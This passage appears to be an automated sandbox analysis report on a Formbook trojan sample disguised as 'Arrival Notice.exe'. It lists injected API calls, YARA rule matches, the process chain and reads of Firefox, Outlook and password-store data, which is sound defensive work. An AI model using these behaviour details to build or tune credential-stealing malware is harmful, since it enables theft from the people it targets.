Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03873090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03873010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_038739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03873D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03873D70 NtOpenThread
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F4650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F4340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F39B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2FA0 NtQuerySection
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F2AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F3010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F3090 NtSetValueKey
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F3D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_050F3D70 NtOpenThread
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_02F97B40 NtCreateFile
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_02F97E30 NtClose
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_02F97F90 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_02F97CA0 NtReadFile
Source: C:\Windows\SysWOW64\clip.exe, Code function: 3_2_02F97D90 NtDeleteFile
Source: C:\Users\user\Desktop\Arrival Notice.exe, Code function: 0_2_0041D5EB: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\Arrival Notice.exe, Code function: 0_2_00411201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\Arrival Notice.exe, Code function: 0_2_0041E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051770E93_2_051770E9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517132D3_2_0517132D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050AD34C3_2_050AD34C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0510739A3_2_0510739A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C52A03_2_050C52A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050DB2C03_2_050DB2C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051612ED3_2_051612ED
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050DD2F03_2_050DD2F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C3D403_2_050C3D40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05171D5A3_2_05171D5A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05177D733_2_05177D73
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050DFDC03_2_050DFDC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05139C323_2_05139C32
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517FCF23_2_0517FCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517FF093_2_0517FF09
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C1F923_2_050C1F92
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517FFB13_2_0517FFB1
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05083FD23_2_05083FD2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05083FD53_2_05083FD5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C9EB03_2_050C9EB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051559103_2_05155910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C99503_2_050C9950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050DB9503_2_050DB950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0512D8003_2_0512D800
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C38E03_2_050C38E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517FB763_2_0517FB76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050DFB803_2_050DFB80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05135BF03_2_05135BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050FDBF93_2_050FDBF9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05177A463_2_05177A46
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517FA493_2_0517FA49
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05133A6C3_2_05133A6C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05105AA03_2_05105AA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05161AA33_2_05161AA3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0515DAAC3_2_0515DAAC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0516DAC63_2_0516DAC6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F817203_2_02F81720
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F9A2803_2_02F9A280
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F7ABB03_2_02F7ABB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F7CB303_2_02F7CB30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F7C9103_2_02F7C910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F7C9083_2_02F7C908
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F832703_2_02F83270
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F0A43A3_2_04F0A43A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F0C0FC3_2_04F0C0FC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F0B1683_2_04F0B168
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F0BC443_2_04F0BC44
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F0BD643_2_04F0BD64
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03887E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0382B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03875130 appears 58 times
            Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 0513F290 appears 103 times
            Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 050AB970 appears 262 times
            Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 0512EA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 05107E54 appears 107 times
            Source: C:\Windows\SysWOW64\clip.exe | Code function: String function: 050F5130 appears 58 times
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: String function: 003D0A30 appears 46 times
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: String function: 003CF9F2 appears 31 times
            Source: Arrival Notice.exe, 00000000.00000003.1658529365.0000000003B53000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice.exe
            Source: Arrival Notice.exe, 00000000.00000003.1657932707.0000000003CAD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice.exe
            Source: Arrival Notice.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Rule metadata for Windows_Trojan_Formbook_1112e116 (identical for all nine matches above): reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/10
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_004237B5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_004110BF AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_004116C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_004251CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0043A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0042648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003B42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\Arrival Notice.exe | File created: C:\Users\user\AppData\Local\Temp\autCCA.tmp
            Source: Arrival Notice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: clip.exe, 00000003.00000003.2037350108.0000000003300000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134866253.0000000003322000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.2037451842.0000000003322000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Arrival Notice.exe | ReversingLabs: Detection: 36%
            Source: Arrival Notice.exe | Virustotal: Detection: 27%
            Source: unknown | Process created: C:\Users\user\Desktop\Arrival Notice.exe "C:\Users\user\Desktop\Arrival Notice.exe"
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival Notice.exe"
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\clip.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\clip.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Arrival Notice.exe | Static file information: File size 1287680 > 1048576
            Source: Arrival Notice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Arrival Notice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Arrival Notice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Arrival Notice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Arrival Notice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Arrival Notice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1783713149.000000000098E000.00000002.00000001.01000000.00000004.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4134616336.000000000098E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Arrival Notice.exe, 00000000.00000003.1657575687.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1658529365.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1764019679.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768607791.0000000003600000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1863174588.0000000004D25000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.0000000005080000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.000000000521E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1866257159.0000000004ED5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Arrival Notice.exe, 00000000.00000003.1657575687.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1658529365.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1863649908.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1764019679.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768607791.0000000003600000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000003.1863174588.0000000004D25000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.0000000005080000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.000000000521E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1866257159.0000000004ED5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1863405083.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1831030216.0000000003214000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135623899.0000000001108000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4136624660.00000000056AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4134866253.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000031BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.000000000788C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4136624660.00000000056AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4134866253.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000031BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.000000000788C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1863405083.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1831030216.0000000003214000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135623899.0000000001108000.00000004.00000020.00020000.00000000.sdmp
            Source: Arrival Notice.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Arrival Notice.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Arrival Notice.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Arrival Notice.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Arrival Notice.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_003D0A76 push ecx; ret 0_2_003D0A89
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004031C0 push eax; ret 1_2_004031C2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004161D3 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004162CC push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417356 push ebx; retf 1_2_00417359
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416338 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004083DA push es; ret 1_2_004083DE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040BBEC pushad ; iretd 1_2_0040BBEE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418577 push 2823B84Bh; retf 1_2_00418587
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417D38 push ecx; iretd 1_2_00417D39
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00411E39 push esp; ret 1_2_00411E41
